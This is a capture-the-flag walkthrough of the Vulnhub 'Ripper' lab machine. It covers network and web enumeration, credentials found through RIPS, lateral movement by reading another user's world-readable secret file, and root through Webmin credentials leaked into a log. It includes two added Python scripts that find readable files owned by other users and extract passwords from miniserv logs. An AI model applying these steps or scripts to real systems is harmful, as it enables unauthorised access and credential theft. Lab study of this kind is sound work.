Vulnhub: Ripper target machine, detailed testing walkthrough

Ripper

Identifying the target host IP address

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.16.173.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:81:10:a5      2     120  PCS Systemtechnik GmbH                                                   
 192.168.56.224  08:00:27:72:76:55      2     120  PCS Systemtechnik GmbH                                                   


Using Kali Linux's built-in netdiscover tool, the target host's IP address is identified as 192.168.56.224.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.224 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-15 20:34 EST
Nmap scan report for bogon (192.168.56.224)
Host is up (0.000064s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09:1a:06:6e:ed:a0:9b:6f:d7:c7:78:83:3a:f7:7a:9c (RSA)
|   256 99:f1:83:7c:15:b9:db:a7:a8:56:96:05:ae:5d:d3:ee (ECDSA)
|_  256 f4:8c:5a:90:99:ea:d6:24:ba:5a:2d:13:e9:ce:68:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:72:76:55 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.94 seconds

The Nmap results show three open ports on the target: 22 (SSH), 80 (HTTP, Apache 2.4.29) and 10000 (HTTP, Webmin MiniServ 1.910).

Getting a shell

Browsing to port 80 returns the Apache2 default page, and robots.txt does not exist there. Next, run a directory scan:

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ gobuster dir -u http://192.168.56.224 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.224
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/15 20:41:33 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
Progress: 220336 / 220561 (99.90%)
===============================================================
2022/12/15 20:41:59 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ nikto -h http://192.168.56.224
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.224
+ Target Hostname:    192.168.56.224
+ Target Port:        80
+ Start Time:         2022-12-15 22:29:16 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5c3f2156d5d01, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2022-12-15 22:30:03 (GMT-5) (47 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ dirb http://192.168.56.224       

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Dec 15 22:30:55 2022
URL_BASE: http://192.168.56.224/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.224/ ----
+ http://192.168.56.224/index.html (CODE:200|SIZE:10918)                                                                    
+ http://192.168.56.224/server-status (CODE:403|SIZE:279)                                                                   
                                                                                                                            
-----------------
END_TIME: Thu Dec 15 22:30:57 2022
DOWNLOADED: 4612 - FOUND: 2
                                         

Gobuster, nikto and dirb found no new directories, so let gobuster scan for files with common extensions:

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ gobuster dir -u http://192.168.56.224 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.html,.txt    
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.224
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              txt,php,sh,html
[+] Timeout:                 10s
===============================================================
2022/12/15 22:32:22 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10918]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1101024 / 1102805 (99.84%)
===============================================================
2022/12/15 22:34:56 Finished
===============================================================

Gobuster found no files either, so move on to port 10000.

Accessing port 10000 over plain HTTP returns a page stating that the server runs in SSL mode and pointing to an HTTPS URL that uses a hostname, so first add a hosts entry for it:

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.224  ripper-min

Browse to:

https://ripper-min:10000/

This returns a user login page. Check robots.txt on this port as well:

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ curl -k https://ripper-min:10000/robots.txt     
User-agent: *
Disallow: /
d2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg==
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ echo 'd2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg==' | base64 -d
we scan php codes with rips

On the RIPS website, the download and installation section shows that after installation the tool lives under /rips/. Trying this directory on both port 80 and port 10000, the RIPS service is found on port 80.

The RIPS page can scan the files under /var/www for vulnerabilities; the result reports four files with findings (information disclosure).

One of them, ./html/rips/secret.php, contains a username and password:

username: ripper

password:Gamespeopleplay

Trying to log into port 10000 with this account fails, so it may be an SSH password instead:

┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ ssh ripper@192.168.56.224 
The authenticity of host '192.168.56.224 (192.168.56.224)' can't be established.
ED25519 key fingerprint is SHA256:Gz/RqLZwvom5GaG8tBiFtAT9fnNDcbSol7p6Fnfe0G0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.224' (ED25519) to the list of known hosts.
ripper@192.168.56.224's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

276 packages can be updated.
211 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Fri Jun  4 13:26:34 2021 from 10.0.0.154
ripper@ripper-min:~$ id
uid=1000(ripper) gid=1000(ripper) groups=1000(ripper),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
ripper@ripper-min:~$ 

ripper@ripper-min:~$ cat flag.txt 
__________.____________________________________________ 
\______   \   \______   \______   \_   _____/\______   \
 |       _/   ||     ___/|     ___/|    __)_  |       _/
 |    |   \   ||    |    |    |    |        \ |    |   \
 |____|_  /___||____|    |____|   /_______  / |____|_  /
        \/                                \/         \/ 

flag{15ea80f080be3714df1ef97bac5d7151}

C0ngratulation on getting user ! Lets get root now :)
ripper@ripper-min:~$ 

Privilege escalation

The author's hint says to get a shell as every user first and then escalate to root.

ripper@ripper-min:/tmp$ cd /home
ripper@ripper-min:/home$ ls -alh
total 16K
drwxr-xr-x  4 root   root   4.0K Jun  4  2021 .
drwxr-xr-x 24 root   root   4.0K Jun  4  2021 ..
drwxr-xr-x 15 cubes  cubes  4.0K Jun  4  2021 cubes
drwxr-xr-x 16 ripper ripper 4.0K Jun  4  2021 ripper
ripper@ripper-min:/home$ 

In other words, the next step is to get a shell as cubes.

ripper@ripper-min:/home$ cd cubes/
ripper@ripper-min:/home/cubes$ ls -alh
total 92K
drwxr-xr-x 15 cubes cubes 4.0K Jun  4  2021 .
drwxr-xr-x  4 root  root  4.0K Jun  4  2021 ..
-rw-------  1 cubes cubes  384 Jun  4  2021 .bash_history
-rw-r--r--  1 cubes cubes  220 Jun  4  2021 .bash_logout
-rw-r--r--  1 cubes cubes 3.7K Jun  4  2021 .bashrc
drwx------ 10 cubes cubes 4.0K Jun  4  2021 .cache
drwx------ 11 cubes cubes 4.0K Jun  4  2021 .config
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Desktop
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Documents
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Downloads
-rw-r--r--  1 cubes cubes 8.8K Jun  4  2021 examples.desktop
drwx------  3 cubes cubes 4.0K Jun  4  2021 .gnupg
-rw-------  1 cubes cubes  334 Jun  4  2021 .ICEauthority
drwxrwxr-x  3 cubes cubes 4.0K Jun  4  2021 .local
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Music
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Pictures
-rw-r--r--  1 cubes cubes  807 Jun  4  2021 .profile
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Public
drwx------  2 cubes cubes 4.0K Jun  4  2021 .ssh
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Templates
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Videos
ripper@ripper-min:/home/cubes$ cd .ssh
-bash: cd: .ssh: Permission denied
ripper@ripper-min:/home/cubes$ cat .bash_history
cat: .bash_history: Permission denied

cubes' home directory cannot be read by ripper, so use find to locate other files owned by cubes elsewhere on the filesystem:

ripper@ripper-min:/home/cubes$ find / -user cubes -type f 2>/dev/null
/home/cubes/.profile
/home/cubes/.bashrc
/home/cubes/.ICEauthority
/home/cubes/examples.desktop
/home/cubes/.bash_logout
/home/cubes/.bash_history
/mnt/secret.file
ripper@ripper-min:/home/cubes$ ls -alh /mnt/secret.file 
-rw-rw-r-- 1 cubes cubes 60 Jun  4  2021 /mnt/secret.file
ripper@ripper-min:/home/cubes$ cat /mnt/secret.file 
This is my secret file

[file system]
-passwd : Il00tpeople
ripper@ripper-min:/home/cubes$ 
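The find command above lists everything cubes owns, but most of it is unreadable dotfiles in the home directory; the one useful hit was /mnt/secret.file, which is mode 0664 and therefore world-readable. The following Python script is an added example (not part of the original post) that does the same search but skips the owner's home directory and reports only files the current user can actually read, printing the mode string so that ACL-bearing entries are visible. demo() builds a constructed temporary tree that mimics /home/cubes and /mnt/secret.file; the path names and file contents in it are copied from the walkthrough, everything else is assumed.

```python
"""Readable files owned by another user, outside that user's home.

Added example, not from the original post. Reproduces
`find / -user <name> -type f 2>/dev/null` but filters on readability
and skips the owner's home, which is mostly noise when it is 0700/0600.
"""
import os
import pwd
import stat
import sys
import tempfile


def find_user_files(root, uid, skip_dirs=()):
    """Return (path, mode_string, readable) for regular files under root owned by uid.

    skip_dirs: directories not to descend into (e.g. the owner's home).
    Unreadable directories are silently skipped, as 2>/dev/null did above.
    """
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if any(dirpath == d or dirpath.startswith(d + os.sep) for d in skip_dirs):
            dirnames[:] = []          # prune this subtree
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or st.st_uid != uid:
                continue
            hits.append((path, stat.filemode(st.st_mode), os.access(path, os.R_OK)))
    return hits


def readable_only(hits):
    """Keep only entries the current user can read."""
    return [(p, m) for p, m, ok in hits if ok]


def demo():
    """Constructed tree: /home/cubes with a 0600 history, /mnt/secret.file at 0664."""
    root = tempfile.mkdtemp(prefix="ripper-demo-")
    home = os.path.join(root, "home", "cubes")
    mnt = os.path.join(root, "mnt")
    os.makedirs(home)
    os.makedirs(mnt)
    hist = os.path.join(home, ".bash_history")
    with open(hist, "w") as f:
        f.write("su root\n")
    os.chmod(hist, 0o600)
    secret = os.path.join(mnt, "secret.file")
    with open(secret, "w") as f:
        f.write("This is my secret file\n\n[file system]\n-passwd : Il00tpeople\n")
    os.chmod(secret, 0o664)
    # Files we just created are owned by us, so search for our own uid.
    hits = readable_only(find_user_files(root, os.getuid(), skip_dirs=(home,)))
    return [os.path.relpath(p, root) for p, _ in hits]


if __name__ == "__main__":
    # Usage on a real box: python3 this.py cubes /   (assumed invocation)
    if len(sys.argv) == 3:
        user = pwd.getpwnam(sys.argv[1])
        for path, mode in readable_only(find_user_files(sys.argv[2], user.pw_uid, (user.pw_dir,))):
            print(mode, path)
    else:
        print(demo())
```

On the walkthrough's box this would have reported only /mnt/secret.file, which is exactly the file that held the cubes password.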

ripper@ripper-min:/home/cubes$ su - cubes
Password: 
cubes@ripper-min:~$ id
uid=1001(cubes) gid=1001(cubes) groups=1001(cubes)
cubes@ripper-min:~$ sudo -l
[sudo] password for cubes: 
Sorry, user cubes may not run sudo on ripper-min.
cubes@ripper-min:~$ cd /home/cubes/
cubes@ripper-min:~$ ls -alh
total 92K
drwxr-xr-x 15 cubes cubes 4.0K Jun  4  2021 .
drwxr-xr-x  4 root  root  4.0K Jun  4  2021 ..
-rw-------  1 cubes cubes  384 Jun  4  2021 .bash_history
-rw-r--r--  1 cubes cubes  220 Jun  4  2021 .bash_logout
-rw-r--r--  1 cubes cubes 3.7K Jun  4  2021 .bashrc
drwx------ 10 cubes cubes 4.0K Jun  4  2021 .cache
drwx------ 11 cubes cubes 4.0K Jun  4  2021 .config
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Desktop
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Documents
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Downloads
-rw-r--r--  1 cubes cubes 8.8K Jun  4  2021 examples.desktop
drwx------  3 cubes cubes 4.0K Jun  4  2021 .gnupg
-rw-------  1 cubes cubes  334 Jun  4  2021 .ICEauthority
drwxrwxr-x  3 cubes cubes 4.0K Jun  4  2021 .local
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Music
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Pictures
-rw-r--r--  1 cubes cubes  807 Jun  4  2021 .profile
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Public
drwx------  2 cubes cubes 4.0K Jun  4  2021 .ssh
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Templates
drwxr-xr-x  2 cubes cubes 4.0K Jun  4  2021 Videos
cubes@ripper-min:~$ 

cubes@ripper-min:~$ cat .bash_history 
cd /var/
ls
cd webmin/
ks
ls
cd backup/
ls
cd /mnt/
ls -la
nano s.txt
ls
rm s.txt 
nano secret.file
su ripper
sudo apt
su root
cd /var/
ls
cd webmin/
ls
mkdir backup
cd backup/
cd ..
ls
cat miniserv.
cat miniserv.log 
cd modules/
ls
cd ..
ls
cat miniserv.error 
ls
cat blocked 
cp miniserv.error backup/miniser.log
cd backup/
ls
nano miniser.log 
cd /mnt/
ls
nano secret.file
su root
cubes@ripper-min:~$ 

The history references /var/webmin, so take a look there. The directory itself is drwxrwx--- root:bin and cubes is not in group bin, but the trailing + in the ls output means an ACL is set (getfacl /var/webmin shows the entries), which is presumably what lets cubes enter it:

cubes@ripper-min:/var/webmin$ cd backup
cubes@ripper-min:/var/webmin/backup$ ls -alh
total 12K
drwxrwxr-x+ 2 cubes cubes 4.0K Jun  4  2021 .
drwxrwx---+ 4 root  bin   4.0K Jun  4  2021 ..
-rw-rwx---+ 1 cubes cubes 2.6K Jun  4  2021 miniser.log
cubes@ripper-min:/var/webmin/backup$ cat miniser.log 
[04/Jun/2021:11:21:48 -0400] miniserv.pl started
[04/Jun/2021:11:21:48 -0400] IPv6 support enabled
[04/Jun/2021:11:21:48 -0400] Using MD5 module Digest::MD5
[04/Jun/2021:11:21:48 -0400] Using SHA512 module Crypt::SHA
[04/Jun/2021:11:21:48 -0400] Perl module Authen::PAM needed for PAM is not installed : Can't locate Authen/PAM.pm in @INC (you may need to install the Authen::PAM module) (@INC contains: /root/webmin-1.910 /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.26.1 /usr/local/share/perl/5.26.1 /usr/lib/x86_64-linux-gnu/perl5/5.26 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.26 /usr/share/perl/5.26 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at (eval 15) line 1.
BEGIN failed--compilation aborted at (eval 15) line 1.
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Authentication : session_login.cgi=username=admin&pass=tokiohotel
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Document follows : This web server is running in SSL mode. Try the URL <a href='https://ripper-min:10000/'>https://ripper-min:10000/</a> instead.<br>
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Document follows : This web server is running in SSL mode. Try the URL <a href='https://ripper-min:10000/'>https://ripper-min:10000/</a> instead.<br>
[04/Jun/2021:11:33:29 -0400] Reloading configuration
[04/Jun/2021:11:33:39 -0400] Reloading configuration
Use of uninitialized value in numeric ne (!=) at /root/webmin-1.910/bind8/bind8-lib.pl line 2397.
Use of uninitialized value $ip in concatenation (.) or string at /root/webmin-1.910/system-status/system_info.pl line 39.
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value $ip in concatenation (.) or string at /root/webmin-1.910/system-status/system_info.pl line 39.
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value $ip in concatenation (.) or string at /root/webmin-1.910/system-status/system_info.pl line 39.
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
cubes@ripper-min:/var/webmin/backup$

miniser.log is a copy of Webmin's error log, and it records a login attempt with the username and password in cleartext (admin / tokiohotel); these are probably Webmin credentials:
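The interesting entry in that log is the "Authentication : session_login.cgi=username=...&pass=..." line, where the login form's parameters were written into the error log verbatim. The following Python script is an added example (not part of the original post or of Webmin) that scans miniserv-style log text for such lines and pulls out the client address and credential pair; it is the kind of check worth running over any copied or backed-up Webmin log that a low-privileged user can read. The sample log text is constructed from the entries shown above; the parameter names username and pass are the ones this log uses, and accepting user as an alternative key is an assumption.

```python
"""Extract credentials leaked into Webmin miniserv log lines.

Added example, not from the original post. Matches lines of the form
  [timestamp] [client-ip] Authentication : <cgi>=<url-encoded params>
and decodes the parameters with the standard query-string parser.
"""
import re
import sys
from urllib.parse import parse_qs

# Constructed sample, taken from the miniser.log entries in the walkthrough.
SAMPLE_LOG = """\
[04/Jun/2021:11:21:48 -0400] miniserv.pl started
[04/Jun/2021:11:21:48 -0400] Perl module Authen::PAM needed for PAM is not installed : Can't locate Authen/PAM.pm in @INC
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Authentication : session_login.cgi=username=admin&pass=tokiohotel
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Document follows : This web server is running in SSL mode.
[04/Jun/2021:11:33:29 -0400] Reloading configuration
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
"""

AUTH_LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+\[(?P<ip>[^\]]+)\]\s+Authentication\s*:\s*"
    r"(?P<cgi>[\w.\-]+)=(?P<query>\S*)\s*$"
)

# Parameter names seen in this log; "user" is an assumed alternative spelling.
USER_KEYS = ("username", "user")
PASS_KEYS = ("pass",)


def _first(params, keys):
    for k in keys:
        if params.get(k):
            return params[k][0]
    return None


def extract_credentials(log_text):
    """Return one dict per Authentication line that carries a username and password."""
    found = []
    for line in log_text.splitlines():
        m = AUTH_LINE.match(line)
        if not m:
            continue
        params = parse_qs(m.group("query"), keep_blank_values=True)
        user = _first(params, USER_KEYS)
        password = _first(params, PASS_KEYS)
        if user is None or password is None:
            continue
        found.append({
            "timestamp": m.group("ts"),
            "client": m.group("ip"),
            "cgi": m.group("cgi"),
            "username": user,
            "password": password,
        })
    return found


if __name__ == "__main__":
    # Usage: python3 this.py /var/webmin/backup/miniser.log  (path is an assumption)
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LOG
    for c in extract_credentials(text):
        print(f"{c['timestamp']} {c['client']} {c['cgi']}: {c['username']} / {c['password']}")
```

Run against the sample it reports a single pair, admin / tokiohotel, from client 10.0.0.154, which is what the walkthrough then used against the Webmin login page.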

Logging into the Webmin admin panel with them succeeds. Webmin's miniserv runs as root by default, so commands issued through its web terminal feature run as root, and this directly yields a root shell and the root flag:

[admin@ripper-min ~]# id
uid=0(root) gid=0(root) groups=0(root)
[admin@ripper-min root]# ls -alh
total 30M
drwx------   7 root root 4.0K Jun  4  2021 .
drwxr-xr-x  24 root root 4.0K Jun  4  2021 ..
-rw-------   1 root root 1.5K Jun  4  2021 .bash_history
-rw-r--r--   1 root root 3.1K Apr  9  2018 .bashrc
drwx------   2 root root 4.0K Aug  6  2020 .cache
drwx------   3 root root 4.0K Dec 15 23:41 .gnupg
drwxr-xr-x   3 root root 4.0K Jun  4  2021 .local
-rw-r--r--   1 root root  148 Aug 17  2015 .profile
-rw-r--r--   1 root root  170 Jun  4  2021 .wget-hsts
-rw-r--r--   1 root root  252 Jun  4  2021 flag.txt
drwxr-xr-x   6 root root 4.0K Jun  4  2021 snap
drwxr-xr-x 132 root bin   12K Jun  4  2021 webmin-1.910
-rw-r--r--   1 root root  30M May  9  2019 webmin.tar.gz
[admin@ripper-min root]# cat flag.txt
.---..-.-.-..-..-..--.     .---. .-..---..---..---..---. 
| |-'| | | || .` || \ \### | |-< | || |-'| |-'| |- | |-< 
`-'  `-----'`-'`-'`-'-'    `-'`-'`-'`-'  `-'  `---'`-'`-'

COngrats !!! You have rooted this box !!

Follow me on twitter @san3ncrypt3d

[admin@ripper-min root]#  

posted @ 2022-12-16 12:54  Jason_huawen